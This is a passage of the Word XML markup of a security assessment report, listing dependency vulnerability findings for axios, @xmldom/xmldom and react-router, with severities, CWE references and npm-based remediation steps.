                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommended Fix</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4388AC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Set allowScriptedContent: false in epub.js renderTo() configuration. Additionally, implement server-side EPUB sanitization to strip &lt;script&gt; tags from chapter HTML during upload.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5BF2A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3C46B1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation Status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450012">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E03AB97">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ED3367">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>4.2 High Severity Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1238B60A">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED0597D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>VD-004: Vulnerable Dependency — axios (15 advisories)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3F510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B13B40">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding ID</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37C96A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="75E4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B8A600">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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D194F1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>axios 1.0.0-1.15.1 Has Multiple High-Severity Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="19D05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B070D8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source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140046">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SCA — npm audit (automated pipeline)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1FCF1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071D09">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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2378EF87">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="71403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88CA93">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</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3E77C6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A06:2021 — Vulnerable and Outdated Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1F025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E6BDE7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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58AAE8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-1395: Dependency on Vulnerable Third-Party Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4DAC4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479D23">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS v3.1</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37F6D7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5+ (multiple CVEs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6808C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1B9077">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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CC67FB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The axios HTTP client (v1.8.4 installed) has 15 known advisories including SSRF bypass via NO_PROXY normalization, prototype pollution gadgets enabling credential injection, header injection, CRLF injection in multipart uploads, and unbounded recursion DoS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="00C98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7CCA45">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Business Impact</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150C53">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker can exploit axios vulnerabilities to bypass proxy protections, inject headers, tamper with HTTP responses, or cause denial of service.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0CAF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F07606">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reproduction Steps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55E48F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Automated: npm audit detects this on every pipeline run. The SCA quality gate fails the build.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="087E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DA3604">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommended Fix</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52A84B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Run: npm audit fix to upgrade to patched version. If breaking changes exist, manually update to axios &gt;=1.15.2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5E777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06B099">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation Status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EB0D3A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F15DCE7">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A81C2A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>VD-005: Vulnerable Dependency — @xmldom/xmldom (5 advisories)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38A7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FB0B51">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding ID</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5D7586">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6C7E4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B6B232">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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235702">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>@xmldom/xmldom &lt;=0.8.12 Has XML Injection and DoS Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3646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2A06C3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source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945743">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SCA — npm audit (automated pipeline)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1708F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B6F00F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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45E54636">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2CF74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F15F27">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</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3410D6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A06:2021 — Vulnerable and Outdated Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="705DA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7BD9C8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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2C7A45">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-611: Improper Restriction of XML External Entity Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="67225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E47BB8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS v3.1</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0F0FE6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5+ (multiple CVEs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="47297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34FDC4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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D93741">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>xmldom has uncontrolled recursion in XML serialization (DoS), XML injection through unvalidated DocumentType/ProcessingInstruction/Comment/CDATA serialization. epubjs 0.3.89-0.3.93 depends on this vulnerable version.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="57C85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4EB69C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Business Impact</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9144AC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>XML injection could allow attacker-controlled markup in parsed EPUB content. DoS via crafted XML in EPUB files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3ACD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3F8C90">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reproduction Steps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4F7074">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Automated: npm audit flags this. Fix requires upgrading epubjs to 0.4.2 (breaking change).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="35743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6C497E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommended Fix</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5F7B9D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Run: npm audit fix --force to upgrade epubjs (may require code changes for breaking API changes).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="30DF0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120744">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation Status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761F91">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E7AA965">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78069A9B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>VD-006: Vulnerable Dependency — react-router (7 advisories)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BAB9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F9BC51">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding ID</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3883C8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-006</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7E84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16786B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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D3E10B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>react-router 7.0-7.12 Has XSS, CSRF, and DoS Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="71CA4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A20D57">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source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0ECEA1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SCA — npm audit (automated pipeline)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="03018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03C321">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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09643912">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="615EB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F524E2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</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908FC5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A06:2021 — Vulnerable and Outdated Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7C88F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7AA90A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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38E883">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-79: XSS, CWE-352: CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="36B2F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CC33E6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS v3.1</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B0C2CD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5+ (multiple CVEs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7F21D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F5C7EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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B27CCA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
